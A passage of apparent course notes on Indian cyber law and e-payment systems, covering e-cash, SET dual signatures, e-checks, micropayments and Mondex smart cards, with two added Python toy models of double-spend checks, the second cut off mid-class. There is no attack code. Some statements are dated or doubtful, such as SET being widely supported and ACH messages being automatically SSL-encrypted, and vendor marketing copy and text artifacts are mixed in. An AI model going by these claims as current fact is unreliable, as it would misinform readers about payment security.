Section 65: Tampering with computer source documents. Intentional concealment, destruction or alteration of source code when the computer source code is required to be kept or maintained by law for the time being in force. Punishment: imprisonment up to three years, or a fine up to 2 lakh rupees, or both.

Section 66: Hacking. Punishment: imprisonment up to three years, or a fine up to 5 lakh rupees, or both.

Section 66A: Sending offensive messages through electronic means. Sending any information through an electronic message that is grossly offensive or has menacing character and might cause insult, injury, criminal intimidation, enmity, hatred or ill will etc., or sending such mail intended to deceive or to mislead the addressee or recipient about the origin of such messages. Punishment: imprisonment up to three years and a fine.

Criticisms

The 2008 Amendment Act was passed in an eventful Parliamentary session on 23 December 2008 with no discussion in the House. Some cyber law observers have criticized the amendments for the lack of legal and procedural safeguards to prevent violation of the civil liberties of Indians. There has also been appreciation of the amendments from many observers because they address the issue of cyber security.

Section 69 empowers the Central Government, a State Government or its authorized agency to intercept, monitor or decrypt any information generated, transmitted, received or stored in any computer resource if it is necessary or expedient to do so in the interest of the sovereignty or integrity of India, defence of India, security of the State, friendly relations with foreign States or public order, or for preventing incitement to the commission of any cognizable offence, or for the investigation of any offence. They can also secure assistance from computer personnel in decrypting data (mandatory decryption) under penalty of imprisonment.

Section 66A is widely criticized. It has led to numerous abuses reported by the press. Section 66A has also been criticised and challenged in the Lucknow and Madras High Courts on its constitutional validity. Relying on Section 66A, the Bombay High Court held that creating a website and storing false information on it can constitute a cyber crime. (Section 66A was subsequently struck down as unconstitutional by the Supreme Court of India in Shreya Singhal v. Union of India, 2015.)


Requirements For E-payments

The various factors that have led financial institutions to make use of electronic payments are:

1. Decreasing technology cost: the cost of the technology used in payment networks is decreasing day by day.

2. Reduced operational and processing cost: due to the reduced technology cost, the processing cost of various commerce activities becomes very low. A very simple reason for this is the fact that in electronic transactions we save both paper and time.

3. Increasing online commerce.

Some Examples Of EPS-

Online Reservation

Online Bill Payment

Online Order Placing (Nirulas)

Online Ticket Booking ( Movie)

Major Internet Payment Methods

Secure Electronic Transaction (SET) protocol for implementing credit card payment

An electronic check system for supporting check payment

An electronic funds transfer and electronic cash system for emulating physical cash payment

Other methods

• Micropayment methods and smart card methods

Two Storage Methods

On-line

The individual does not personally hold the electronic cash

A trusted third party, e.g. an online bank, holds customers' cash accounts

Off-line

The customer holds cash on a smart card or in a software wallet

Preventing fraud and double spending requires tamper-resistant hardware and cryptographic protection of the stored value, since the issuer is not consulted at the time of payment


E-Cash

A system that allows a person to pay for goods or services by transmitting a number from one computer to another

Like the serial numbers on real currency notes, the e-cash numbers are unique

It is issued by a bank and represents a specified sum of real money

It is anonymous and reusable

Electronic Cash Security

Cryptographic protocols prevent double spending: the issuing bank records each serial number as it is deposited and rejects a second deposit of the same number

Anonymity is preserved unless double spending is attempted

Serial numbers can allow tracing to prevent money laundering
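The following is an added example, not code from the original notes or from any real e-cash product, of the on-line e-cash checks just described: the bank mints coins with unique serial numbers and an authentication tag, and refuses to deposit a serial it has already seen. It stands in an HMAC under a bank-held secret for the blind digital signature a real scheme uses, so unlike Chaum-style e-cash the bank here can link a serial to the withdrawing customer; the Bank class, account names and amounts are all constructed for the demonstration.

```python
"""Added example (not from the original notes): a minimal on-line e-cash
scheme with unique serials, a bank-issued tag and a spent-serial ledger."""
import hashlib
import hmac
import secrets


class Bank:
    """Hypothetical issuer: mints coins, keeps accounts, detects reuse."""

    def __init__(self):
        self._key = secrets.token_bytes(32)   # bank secret; never leaves the bank
        self._spent = set()                   # serial numbers already deposited
        self.accounts = {}                    # constructed balances for the demo

    def _tag(self, serial, value):
        """Authentication tag binding the serial to its value.  A real scheme
        would use a (blind) signature so merchants could verify offline."""
        msg = f"{serial}:{value}".encode()
        return hmac.new(self._key, msg, hashlib.sha256).hexdigest()

    def withdraw(self, customer, value):
        """Debit the customer and mint a coin: a unique serial plus tag."""
        if self.accounts.get(customer, 0) < value:
            raise ValueError("insufficient funds")
        self.accounts[customer] -= value
        serial = secrets.token_hex(16)        # unique, like a banknote's serial
        return {"serial": serial, "value": value, "tag": self._tag(serial, value)}

    def deposit(self, merchant, coin):
        """Verify the tag, reject a serial seen before, then credit the merchant."""
        expected = self._tag(coin["serial"], coin["value"])
        if not hmac.compare_digest(expected, coin["tag"]):
            return "rejected: forged or altered coin"
        if coin["serial"] in self._spent:
            return "rejected: double spend"
        self._spent.add(coin["serial"])
        self.accounts[merchant] = self.accounts.get(merchant, 0) + coin["value"]
        return "accepted"


def demo():
    """Constructed scenario: one honest spend, one double spend, one forgery."""
    bank = Bank()
    bank.accounts["alice"] = 100
    coin = bank.withdraw("alice", 40)
    first = bank.deposit("shop-a", coin)      # alice pays shop A
    second = bank.deposit("shop-b", coin)     # alice replays the same coin at shop B
    forged = dict(coin, value=400)            # value altered; tag no longer matches
    third = bank.deposit("shop-c", forged)
    return first, second, third, bank.accounts


if __name__ == "__main__":
    print(demo())
```

The ledger of spent serials is what makes the on-line model work: the merchant cannot tell a fresh coin from a copied one by inspection, so it asks the bank at the moment of sale. The tag check is placed before the ledger check so that a forged coin is rejected without ever entering the ledger.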

E-Cash Processing


E-Wallet

The e-wallet is another payment scheme that operates like a carrier of e-cash and other information.

The aim is to give shoppers a single, simple and secure way of carrying currency electronically.

Trust is the basis of the e-wallet as a form of electronic payment.

Procedure for using an e-wallet:

1. Decide on an online site where you would like to shop.

2. Download a wallet from the merchant's website.

3. Fill out personal information such as your credit card number, name, address and phone number, and where merchandise should be shipped.

4. When you are ready to buy, click on the wallet button; the buying process is fully executed.


Smart Cards

A smart card is any pocket-sized card with embedded integrated circuits which can process data.

This implies that it can receive input, which is processed and delivered as an output.

Smart card Processing


Smart Card Applications

Ticketless travel

Seoul bus system 4M cards 1B transactions since 1996

Planned the SF Bay Area system

Authentication ID

Medical records

E-cash

Store loyalty programs

Personal profiles

Government

Licenses

Mall parking

Credit cards

It is a plastic card carrying an account number and security code, encoded on a magnetic stripe and printed on the card

It carries a fixed credit limit that can be spent

The customer has to repay the amount spent after some time


Processing a Credit cards payment ndash

Risk in using Credit cards -

Operational Risk

Credit Risk

Legal Risk

Secure Electronic Transaction (SET) Protocol

Jointly designed by MasterCard and Visa with the backing of Microsoft, Netscape, IBM, GTE, SAIC and others

Designed to provide security for card payments as they travel on the Internet

In contrast with the Secure Sockets Layer (SSL) protocol, SET validates consumers and merchants in addition to providing secure transmission

SET specification

Uses public key cryptography and digital certificates for validating both consumers and merchants

Provides privacy, data integrity, user and merchant authentication, and consumer non-repudiation

The SET Protocol

What Is a Payment Gateway?

A payment gateway is an e-commerce application service provider service that authorizes payments for e-businesses, online shopping, etc.

A payment gateway protects credit card details by encrypting sensitive information such as credit card numbers, to ensure that the information passes securely between the customer and the merchant and also between the merchant and the payment processor.

How It works

Payments In India

Going the e-way

e-PAYMENT SYSTEM IN INDIA

• Ever-increasing technology changes

• Growing Internet access and mobile subscriber base

• Rising consumer confidence

• Convenient delivery/payment models

• India has been one of the fastest growing countries for payment cards in the Asia-Pacific region

• India currently has approximately 130 million cards (both debit and credit) in circulation


GROWTH IN e-PAYMENT SYSTEM

REGULATION

The Reserve Bank of India (RBI) has been supportive of the development of electronic payments.

In this direction, the Payment and Settlement Systems Act, 2007 was enacted.

Apart from being supportive, the RBI has also initiated various programs to encourage e-payments.

CHANNELS OF PAYMENT

Indian banks have put in place various channels of electronic payments to encourage customers to adopt the electronic mode.

Channels like the Internet, mobile, ATMs and drop boxes are some of the most frequently used channels apart from bank branches.

MARKET MAPPING

The e-payments processing market has two major players, namely Tech Process and Bill Desk, which is a pure-play electronic transaction processing company.

The Indian payment system is transforming from paper mode to electronic mode.

Two main reasons for such a shift are:

1. The regulator has mandated routing all high-value transactions electronically to minimize movement of money and risk.

2. At the retail end, customers are realizing the efficiency of electronic payments.

SHIFTS IN THE PAYMENT SYSTEM

TECHNOLOGICAL ADVANCEMENT IN e-PAYMENT

bull Electronic Clearing Service (Credit and Debit)

bull National Electronic Fund Transfer (NEFT)

THE RULING PLASTIC MONEY

Credit cards

Debit cards

ATM Cards

PayPal

PayPal is a global e-commerce business allowing payments and money transfers to be made through the Internet. Online money transfers serve as electronic alternatives to paying with traditional paper methods such as checks and money orders. It is subject to the US economic sanctions list and other rules and interventions required by US laws or government. PayPal is an acquirer, performing payment processing for online vendors, auction sites and other commercial users, for which it charges a fee. It may also charge a fee for receiving money, proportional to the amount received. The fees depend on the currency used, the payment option used, the country of the sender, the country of the recipient, the amount sent and the recipient's account type. In addition, eBay purchases made by credit card through PayPal may incur extra fees if the buyer and seller use different currencies. On October 3, 2002, PayPal became a wholly owned subsidiary of eBay. Its corporate headquarters are in San Jose, California, United States, at eBay's North First Street satellite office campus. The company also has significant operations in Omaha, Scottsdale, Charlotte and Austin in the United States; Chennai in India; Dublin in Ireland; Kleinmachnow in Germany; and Tel Aviv in Israel. Since July 2007, PayPal has operated across the European Union as a Luxembourg-based bank.

Google Wallet

Google Wallet was launched in 2011, serving a similar function as PayPal: to facilitate payments and transfer money online. It also features highly robust security and additional features such as the ability to send payments as attachments via email.

CHARACTERISTICS OF PAYMENT SYSTEM

• There is no paper involved, so electronic payments can be effected directly from home or office.

• Fast, efficient, safe, secure and generally less costly than paper-based alternatives, e.g. cheques.

• Electronic payments are fully traceable.

• In Ireland, the clearing time for standard electronic payments is next-day value for interbank transfers, subject to the payment instruction being received ahead of 'shut-off' times, which can vary from bank to bank. Payment instructions received after the 'shut-off' time will be processed one working day later.

• Most banks offer same-day value for payments made to other accounts held in that same bank.

• Many banks offer same-day money transfer inter-bank services for large-value payments.

• Unlike cheques, electronic payments don't 'bounce', as payments will not be effected unless the funds are available in the first place.

Features of Payment Methods

• Anonymity: whether the payment method is anonymous

• Security: whether the payment method is secure

• Overhead cost: the overhead cost of processing a payment

• Transferability: whether a payment can be carried out without the involvement of a third party

• Divisibility: whether a payment can be divided into arbitrarily small payments whose sum is equal to the original payment

• Acceptability: whether the payment method is supported globally

4C PAYMENT METHODS

To make the e-commerce system functional, we also need to incorporate payment functions into the system.

In the physical world there are 4 types of payment methods:

• Cash

• Credit card

• Check

• Credit/debit (Fund Transfer)

• A payment method should be:

– Very secure

– Low in overhead cost

– Transferable

– Acceptable anywhere

– Divisible

– Anonymous

Comparison of the 4C payment methods

SET PROTOCOL FOR CREDIT CARD PAYMENT

• The credit card is one of the most commonly used payment methods in e-commerce, in particular B2C e-commerce.

• Before the introduction of the SET protocol, secure credit card payment was usually carried out over an SSL connection.

Advantage of SSL

• It ensures the secure transmission of credit card information over the Internet.

Disadvantage of SSL

• It is not a complete credit card payment method.

• For example, it cannot support on-line credit card authorization.

SET is specially developed to provide secure credit card payment over the Internet. It is now widely supported by major credit card companies, including Visa and MasterCard.

• SET aims at satisfying the following security requirements in the context of credit card payment:

– Confidentiality: sensitive messages are encrypted so that they are kept confidential.

– Integrity: nearly all messages are digitally signed to ensure content integrity.

– Authentication: authentication is performed through a public key infrastructure.

SET network architecture

• Merchant: a seller which is connected to an acquirer.

• Cardholder: a registered holder of the credit card, who is a buyer.

• Issuer: the bank that issues the credit card to a cardholder.

• Acquirer: the bank that serves as an "agent" to link a merchant to multiple issuers.

– A merchant can process various credit cards through a single acquirer.

• Payment Gateway: this is typically connected to the acquirer.

– The payment gateway is situated between the SET system and the financial network of the current credit card system for processing the credit card payment.

SET Digital Certificate System

Dual signature generation and verification

• In the physical credit card system:

– the Payment Instructions (PI), including the cardholder's credit card number and signature, are not kept confidential;

– data integrity can basically be ensured by using printed receipts;

– the cardholder's authentication relies on simple signature checking only.

• In an electronic credit card system:

– the Order Information (OI) and PI can be digitally signed to ensure data integrity;

– the sensitive credit card information may still be disclosed to other people.

• SET introduces a novel method called the dual signature (DS) to ensure data integrity while protecting the sensitive information.

How the merchant and the payment gateway can verify the DS

• The merchant is provided with OI, H[PI] and DS.

• The dual signature can be verified as follows:

Step 1: The merchant first computes

H[ H[PI] || H[OI] ]

Step 2: He then decrypts the dual signature with the cardholder's public signature key as follows:

D_RSA[ DS | key_public_sign,cardholder ]

where key_public_sign,cardholder is the public signature key of the cardholder.

Step 3: Finally, he compares the two terms H[ H[PI] || H[OI] ] and D_RSA[ DS | key_public_sign,cardholder ]. They should be the same if the transmitted DS has not been changed; otherwise the order is not valid.

The payment gateway is provided with PI, H[OI] and DS. It computes H[PI] itself, combines it with the supplied H[OI] to form the same term H[ H[PI] || H[OI] ], and checks it against D_RSA[ DS | key_public_sign,cardholder ] in the same way.

By using the dual signature method, each cardholder can link OI and PI while releasing only the necessary information to the relevant party.

If either the OI or PI is changed, the dual signature will no longer be valid.

DIGITAL ENVELOPE

SET PROTOCOL

The SET protocol has four phases: initiation, purchase, authorization and capture.

• First, the cardholder sends a purchase initiation request to the merchant for initializing the payment. Then the merchant returns a response message to the cardholder.

• In the second phase, the cardholder sends the purchase order together with the payment instruction to the merchant.

• In the third phase, the merchant obtains the authorization from the issuer via the payment gateway.

• Finally, the merchant requests a money transfer to its account.

E-CASH

Electronic money is paperless cash. This money is either stored on a card itself or in an account associated with the card. The most common examples are transit cards, meal plans and PayPal. E-cash can also mean any kind of electronic payment.

Electronic payment systems come in many forms, including virtual cheques, ATM cards, credit cards and stored value cards. The usual security features for such systems are privacy, authenticity and non-repudiation.

There are four major components in an electronic cash system:

• Issuers

• Customers

• Merchants or traders

• Regulators

Issuers can be banks or non-bank institutions; customers are the users who spend e-cash; merchants and traders are the vendors who receive e-cash; regulators are the related authorities or state tax agencies.

For an e-cash transaction to occur we need to go through at least three stages:

• Account setup: customers will need to obtain e-cash accounts through certain issuers. Merchants who would like to accept e-cash will also need to arrange accounts with various e-cash issuers. Issuers typically handle accounting for customers and merchants.

• Purchase: customers purchase certain goods or services and give the merchants tokens which represent the equivalent e-cash. Purchase information is usually encrypted when transmitted over the network.

• Authentication: merchants will need to contact the e-cash issuers about the purchase and the amount of e-cash involved. The e-cash issuers will then authenticate the transaction and approve the amount of e-cash involved.

E-cash payment system

For accessing services online, e-cash is a prime method for secure online payments. The following model shows how the e-cash payment system works.

This is a simple model of the e-cash payment system. It gives us the idea of how the e-cash payment system works; the model is explained properly in the upcoming slides.

The customer approaches his issuer's (bank's) site to access his account. The issuer in return issues the money in the form of tokens, generally in tens and hundreds or as specified by the customer.

In the second phase, the customer endorses those tokens to the merchant to acquire services, for which the customer authenticates the payment for the trader.

In the third phase, the trader approaches the token issuer (the customer's bank); after authenticating the tokens, the issuing bank converts the tokens into electronic funds and transfers the same into the trader's account.

Finally, after getting the payment for the respective services, the trader provides the requisite service or product and also notifies the customer about the approval of the payment made by the customer into the trader's account.

E-cash is a system that allows a person to pay for goods or services by transmitting a number from one computer to another. Like the serial numbers on real currency notes, the e-cash numbers are unique. Each number is issued by a bank and represents a specified sum of real money. It is anonymous and reusable.

Electronic Cash Security

• Complex cryptographic algorithms prevent double spending.

• Anonymity is preserved unless double spending is attempted.

• Serial numbers can allow tracing to prevent money laundering.

E-Cash Processing

E-cash security

Security is of extreme importance while handling online transactions. Faith in the security of the medium of exchange, whether paper or digital, is essential for the economy to function.

E-cash is more secure than other online payment modes because in this case no credential such as a card password is involved; it is simply an online fund transfer from the customer's account to the trader's account.

However, while accessing the customer's account, the customer must keep in mind internet security sweeps or theft. Online hacking and cracking can be avoided by using SSL and TLS website security, keeping the website link on the safe "https" protocol, and running proper internet security software to keep away the threats of malware, eavesdropping and other security threats.

Advantages

• We can transfer funds, purchase stocks and offer a variety of other services without having to handle physical cash or cheques.

• Electronic cash protects its user against theft. With electronic cash, the customer does not need to provide financial information.

• E-cash supports small payments. Other online payment systems charge a fee for every transaction, no matter how high or low it is, but e-cash has a specific limit for additional charges; that is why very low payments are not charged a fee.

Limitations

• However secure the e-cash payment system may be, no one is safe against online fraud. In this case the trader is the fraudulent party: the trader may take the amount but not provide the services.

• While making the payment, it is very important that the internet connection and power supply stay active. If the payment is in process and the internet supply fails in between, it can lead to loss of information, i.e. the amount is charged but does not reach the trader, and the refund takes a very long time; in general the refund time is at least 30-45 days.

• E-cash is not for everyone. Low-income segments without computer and internet access are unable to enjoy the usage of e-cash.

The rise of e-cash is inevitable, but further improvements are needed. Tackling security, anonymity, low-income-group readiness and technology reliability issues will make e-cash closer to perfect. Countries such as India, where people were hesitant to use such methods, have shown tremendous use of online payments and the e-cash payment system. Slowly but steadily the growth is seen, and improving it technologically will make it more reliable and efficient for customers to use.

E-CHECK

What is an electronic check?

It's simply an electronic version of a paper check. When you convert a traditional check into an electronic payment, you can process it through the Automated Clearing House (ACH) Network to save time and money, and because electronic checks have more security features than a paper check, they better protect your business and customers. Another way to think of an electronic check is when a customer pays by entering their bank account information online and electronically sending the money. Electronic checks are becoming increasingly popular because they are so fast, efficient and secure. Electronic checks are sometimes called eChecks, electronic check conversions or Back Office Conversions (BOCs). Read more on what you need to know as you consider using eChecks in your business.

eCheck, a new payment instrument combining the security, speed and processing efficiencies of all-electronic transactions with the familiar and well-developed legal infrastructure and business processes associated with paper checks, is the first and only electronic payment mechanism chosen by the United States Treasury to make high-value payments over the public Internet.

How electronic checks work

The process is simple. First, you run a customer's paper check through an electronic scanner system supplied by your merchant service provider. This virtual terminal captures the customer's banking information and the payment amount. The information is then transferred electronically over the Federal Reserve Bank's ACH Network, which takes the funds from your customer's account and deposits them into yours. After payment approval, the virtual terminal will print a receipt for the customer to sign and keep. Your employee should then void the paper check and return it to the customer. You'll be able to view and report on your merchant transactions online, although features may vary depending on your merchant service provider or your payment processing solution provider.

How does the ACH Network work with eChecks?

The ACH Network is a funds distribution system that moves funds electronically from one entity to another. It's a highly reliable and efficient nationwide electronic network governed by the rules of the National Automated Clearing House Association (NACHA) and the Federal Reserve (Fed). Given its ability to electronically transfer money directly to and from bank accounts, ACH is a faster payment method than traditional paper checks. The ACH payment process is close to the paper check process, only faster. Clients give their bank routing or checking account number and, after verification, the payment is transferred almost immediately, electronically, through the ACH system. Besides checks, the ACH Network also handles debit card transactions, direct deposits of payroll, Social Security and other government benefits, direct debit payments and business-to-business payments.

Reaping the benefits of eChecks

Converting your customers' paper checks into electronic checks helps save time and reduces hassle for your staff, because you can submit payments electronically instead of making trips to the bank. However, time saving and hassle reduction are not the only benefits. Read on for more:

1. Reduce processing costs by up to 60%. eChecks require less manpower to process and don't come with any deposit or transaction fees. As a result, processing an eCheck is generally much cheaper than processing a paper check or credit card transaction.

2. Receive funds sooner. Businesses that use electronic check conversion have their funds deposited almost twice as fast as those using traditional check processing. Billing companies often receive payments within one day.

3. Increase sales. If your business doesn't accept paper checks, offering eChecks expands your customers' options and can increase sales. If you're converting from paper checks to eChecks, you can start accepting international and out-of-state checks while using account validation and customer authentication processes to protect your business from fraud.

4. Work smarter and greener. Electronic check conversion is easy to set up. It relies on the trusted ACH Network. And eChecks help reduce the more than 674 million gallons of fuel used and 36 million tons of greenhouse gas emissions created by transporting paper checks.

5. Decrease errors and fraud. eChecks reduce the potential for errors and fraud because fewer people handle them. Merchant service providers also maintain, monitor and check files against negative account databases that store information about individuals or companies that have records of fraud.

Protecting your business and your customers

Electronic check conversion is one of the most secure payment methods in the electronic payment processing industry because it uses the latest information protection features:

1. Authentication. Merchants must verify that the person providing the checking account information has the authority to use that account. Authentication services and products available to merchants include digital signatures and public key cryptography. Also known as digital certificates, digital signatures encrypt data in a way that gives the receiver a more reliable indication that the information was actually sent by the sender. They're used on the Internet to confirm the identity of a customer, much as a handwritten signature would. Because digital signatures are difficult to tamper with or imitate and are easily transportable, they're a good way to verify identity. Digital signatures are often used to implement electronic signatures, which include any electronic data that carries the intent of a signature. Public key cryptography is a security method that uses keys to encrypt and decrypt a sent message. With electronic check conversion, the private key is a secret mathematical calculation used to create the digital signature on the eCheck, and the public key is the key given to anyone who needs to verify that the sender signed the eCheck and that the electronic transfer has not been tampered with.

2. Duplicate detection. Financial institutions use software and operational controls to prevent and detect duplication of the scanned electronic representations of customer checks.

3. Encryption. The ACH Network automatically encrypts messages using 128-bit encryption and a secure sockets layer (SSL).

How to get started with electronic checks

Here's how to implement electronic check conversion as quickly and easily as possible:

1. Choose a well-established processing company. Good pricing is important, but working with a reliable processor is essential.

2. Notify your customers that your business will begin using electronic check conversion. Federal laws require you to post a notification about this change and give your customers a takeaway copy. You must also provide customers with a phone number to request more information.

3. Look for a processor that makes it easy to align your current business processes with your new electronic processing system, export customer data and integrate your new system with your business management software.

4. QuickBooks Payments offers a complete payment processing solution. Businesses can take payments from their customers in many ways, from ACH bank payments and electronic checks to credit cards, including Visa, MasterCard, Discover and American Express. In addition to offering many ways to get paid, QuickBooks Payments also enables businesses to email invoices to their customers with a Pay Now button. Our data shows us that businesses using QuickBooks Payments are getting paid twice as fast due to the e-invoicing feature.

This diagram illustrates how real-time electronic check processing works using the CyberSource Payment Service:

1. The payer (customer/bill payer) is prompted to authorize the electronic debit and enter the bank routing number (ABA) and account number.

2. The merchant's sales system securely transfers the order information to CyberSource over the Internet.

3. CyberSource forwards the bank routing number and account number to the processor.

4. The routing number and account number are validated and the integrity of the account's checking history is verified. The processor forwards approve/decline results to CyberSource.

5. CyberSource returns the approval/decline message to the merchant.

6. If approved, CyberSource routes the check for settlement through a processor to the Automated Clearinghouse System (ACH). Funds are deposited in approximately 1-3 business days.

Four Different Scenarios of the FSTC E-check System

MICROPAYMENT METHODS

Traditional payment methods are called macropayment methods. A new type of payment method, known as the micropayment method, is emerging to cater for very low value transactions. Examples:

• Millicent (pre-payment/credit based)

• PayWord (post-payment)

MICRO PAYMENT IS

• Very small payments made over the Web

• Transactions too small for credit cards

• Can be as little as a fraction of a cent

• An alternative to subscription and advertising

• Can go in either direction

A micropayment is an e-commerce transaction involving a very small sum of money in exchange for something made available online, such as an application download, a service or Web-based content.

Micropayments are sometimes defined as anything less than 75 cents and can be as low as a fraction of a cent. A special type of system is required for such payments, which are too small to be feasible for processing through credit card companies.

Here's one scheme for micropayment. The user and seller each establish an account with a third-party service provider who monitors, collects and distributes micropayments. The seller encodes per-fee links inside a Web page. When the user initiates a transaction, payment goes through an Internet wallet account managed by the service provider. Micropayments accumulate until they are collected as single larger payments. Such a system is helpful when a user wants to make one-time micropayments to multiple sellers. Seller-based accounts are more common for repeat business with an individual enterprise.

Once a common micropayment standard has been established, some experts predict that streaming media sites, music and application downloads, content vendors, sports access sites and other specialized resources will make pay-per-use common online.

Advantages and risks

With a micropayment system, many small transactions are summarised over a defined period of time and charged in one bill. For that reason micropayments are applicable for businesses where even small costs for every single transaction would be inefficient. [4] The main benefits on the customer side in using micropayments are speed and flexibility. From the merchants' side, speed and acceptable transaction fees are very important. As the transactions involve small amounts of capital, security does not have the highest priority. Much more important than security is trust: users and merchants are more likely to use an insecure payment system from a trusted company than a secure payment system from an untrusted (unknown) company. Therefore the market entry barriers for new providers are high. Any company that wishes to enter this area must have plenty of capital and be willing to invest a lot before any return on investment, as it is extremely difficult for new payment systems to achieve widespread acceptance.

Payment options

Micropayment providers offer various payment modules. Merchants need to sign up for an account with a chosen provider and decide on a module that suits their needs. The customer gets an option (or options) for how to pay for the desired content or goods.

The most common micropayment options are listed below. [6]

• Call2pay: payment by telephone. The customer is requested to call a toll number. The fee is set on a per-call basis for the desired payment amount.

• Handypay: payment via mobile phone bill. The customer enters his or her cell phone number and receives an SMS with a TAN in order to confirm payment.

• Ebank2pay: payment using online banking. The customer transfers the payment amount using his or her online banking access and a TAN. After making payment, the customer receives access to the purchased product.

• Credit card: payment per credit card. The customer enters his credit card data and confirms the transaction. The transactions can optionally be carried out with the 3-D Secure™ method (Verified by VISA™ and Mastercard SecureCode™).

• Direct debit: payment by direct debit. The customer enters his or her bank ID and account number and confirms the direct debit authorization.

PayPal MicroPayments is a micropayment system that charges payments to users' PayPal accounts and allows transactions of less than US$12 to take place. The service is, as of 2013, offered in select currencies only.

Micropayment Uses

• Publishing

• Marketing

• Software

• Entertainment

• Web Services

SMART CARD

A smart card, chip card or integrated circuit card (ICC) is any pocket-sized card with embedded integrated circuits. Smart cards are made of plastic, generally polyvinyl chloride, but sometimes polyethylene terephthalate based polyesters, acrylonitrile butadiene styrene or polycarbonate. Since April 2009 a Japanese company has manufactured reusable financial smart cards made from paper.

Smart cards can provide identification, authentication, data storage and application processing. [2] Smart cards may provide strong security authentication for single sign-on (SSO) within large organizations.

A smart card is any pocket-sized card with embedded integrated circuits which can process data. This implies that it can receive input which is processed and delivered as an output.

What is a Smart Card?

• Standard credit card-sized, with a microchip embedded on it

• Two types: memory-only chips and microprocessor chips

• Can hold up to 32,000 bytes

• Newer smart cards have math co-processors, which perform complex encryption routines quickly

• In 1968 German inventors patented the combination of plastic cards with microchips

Construction of Smart Cards

Why Smart Cards?

• Improve the convenience and security of any transaction

• Provide tamper-proof storage of user and account identity

• Provide vital components of system security

• Protect against a full range of security threats

Advantages

• Flexibility

• Security

• Portability

• Increasing data storage capacity

• Reliability

Schematic overview of a smart card

Smart card Processing

Smart Card Applications

• Ticketless travel

– Seoul bus system: 4M cards, 1B transactions since 1996

– Planned: the SF Bay Area system

• Authentication ID

• Medical records

• E-cash

• Store loyalty programs

• Personal profiles

• Government

• Licenses

• Mall parking

Example: Mondex

OVERVIEW OF MONDEX

Mondex is a smart card electronic cash system which was originally developed by National Westminster Bank in the United Kingdom and subsequently sold to MasterCard International. Mondex launched in a number of markets during the 1990s, expanding from an original trial in Swindon, UK, to Hong Kong, Guelph and New York. It was also trialled on several British university campuses from the late 1990s, including the University of Edinburgh, University of Exeter (between 1997 and 2001), University of York, University of Nottingham, Aston University and Sheffield Hallam University.

• Direct transfer of electronic money between two cards

• Transfer of electronic money over the Internet or telephone networks, etc.

• Keeps transaction records

• Password protection and "lock card" functions

• Portable balance finder to check balance

• Supports multiple currencies

ADVANTAGES

CONSUMER

• Convenience

• Accessibility

• On-chip record of recent transactions

• Home load

• Internet purchases

MERCHANT

• Reliable off-line payment

• Higher security

• Low transaction cost

• Reduced cash handling

FINANCIAL INSTITUTION

• Strengthen customer relationships

• New financial and commercial partnerships

Mondex is a concept for an electronic payment system that provides an alternative to cash, particularly small currency and coins (micro-payment). The concept was invented in 1990 by Tim Jones and Graham Higgins at National Westminster Bank (NatWest) in the UK.

In July 1996, initiated by NatWest and Midland Bank PLC, Mondex International Ltd was officially established by 17 major banks from North America, Asia/Pacific and Europe, and was granted an exclusive licensing agreement with NatWest for the intellectual property rights to develop the Mondex concept, technology and brand. In the same year MasterCard International acquired 51% ownership of Mondex International and fully endorsed the Mondex technology architecture.

How does Mondex Protect Privacy?

Principles protected:

o Limits for collecting personal information

o Limits for using, disclosing and keeping personal information

o Keeping personal information accurate

o Safeguarding personal information

Limits for collecting personal information

o loads from account

o deposits into account

o lost transactions

Limits for using, disclosing and keeping personal information

o safeguard deposits

o to reimburse for non-performance

Keeping personal information accurate

o load and unload are online

o rolling 10 transactions provides exact spend and retailer name

Safeguarding personal information

o firewalls in Multos, between applications (ITSEC 6 designation)

o transaction data to retailer is deliberately limited

o individual transaction data is not collected by banks; Mondex is an unaudited system

The design of a Mondex smart card allows end users to transfer funds electronically onto the card

and then utilize the Mondex smart card to make purchases up to the total cash value held on the

card Mondex smart cards provide an electronicpayment system using all the capabilities

associated with smart card technology The Mondex smart card can be a convenient alternative

to cash

Although the design was five years old at the time the Mondex smart card was actually launched

in 1995 ndash two years before MasterCard assumed control of the technology

The banks that currently support the Mondex smart card include National Bank of Canada

Scotiabank Canada Trust Bank of Montreal Le Mouvement des caisses Desjardins and Toronto

Dominion Bank With so many respected lending institutions banking on the idea the Mondex

smart card is worth a closer look

The Mondex smart card has the ability to make card-to-card transfers, which is not possible with standard credit or debit cards. When you use a credit/debit card to make a purchase, communication is required between the bank and your card. Mondex cards, however, contain an embedded microprocessor with cryptographic protection and tamper-resistant hardware (no hardware is truly tamper-proof) designed to keep attackers out, so two cards can settle a payment between themselves. The ability of the Mondex smart card to do offline transactions means it is less dependent on expensive network infrastructure, reducing transaction costs. Offline transactions may seem anonymous; however, they are actually recorded in the memory of the card's microprocessor and remain retrievable the next time the card is used at an ATM, or as soon as the retailer uploads transaction data to the bank's computer.

A significant disadvantage of Mondex is that transactions aren't truly anonymous. Unlike pre-paid phone cards, which are also based on smart card technology, you can't purchase a Mondex card without revealing your identity. Each card has a unique identification number through which its owner can easily be identified. Mondex smart cards have not been as successful as originally predicted, and customers have not been especially satisfied with the card and its services. Unlike a credit or debit card, your money may be lost forever if you lose a Mondex smart card: losing a Mondex card is just like losing a wallet full of cash. With a credit card you're protected against any loss exceeding $50. This protection is not currently available with a Mondex smart card.

According to Mondex, the system is fully auditable: there is a log of the time, date, amount and participants of each transaction, which hampers the privacy of users. Technically, however, Mondex can't claim to be a fully auditable system. After a number of transactions, overflow can occur as a result of the limited memory in the Mondex smart cards (the card only keeps a rolling window of its most recent transactions). This means that significant data may be lost before Mondex is able to retrieve it. Critics say this loss of data is a critical design flaw, making it difficult for Mondex to reliably detect fraud.

While Mondex smart cards are not a hundred percent secure, they do possess the ability to tolerate minor fraud loss.

Mondex believes its electronic payment system is secure, and is convinced that critics who have voiced concern over security issues are mistaken and misinformed. Perhaps the use of a Mondex smart card depends on a personal level of trust.
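The offline card-to-card transfer and the rolling transaction log described above, as an added example that is not Mondex's own code: a toy purse that settles a payment between two cards with no bank online, checks the transfer's MAC, rejects replays, and keeps only the last ten transactions, so that a bank uploading the log after more than ten payments has already lost the oldest ones. The MAC construction, the shared issuer key and the message layout are assumptions of this model, not the real Mondex protocol.

```python
import hashlib
import hmac
import json
from collections import deque

LOG_SIZE = 10                     # rolling window, matching the "rolling 10 transactions" above
ISSUER_KEY = b"issuer-demo-key"   # constructed; on a real card this lives in tamper-resistant hardware


class Purse:
    """Stored-value purse held on one card (model, not Mondex firmware)."""

    def __init__(self, card_id: str, balance: int):
        self.card_id = card_id
        self.balance = balance              # value in cents
        self.seq = 0                        # per-card counter, makes each transfer unique
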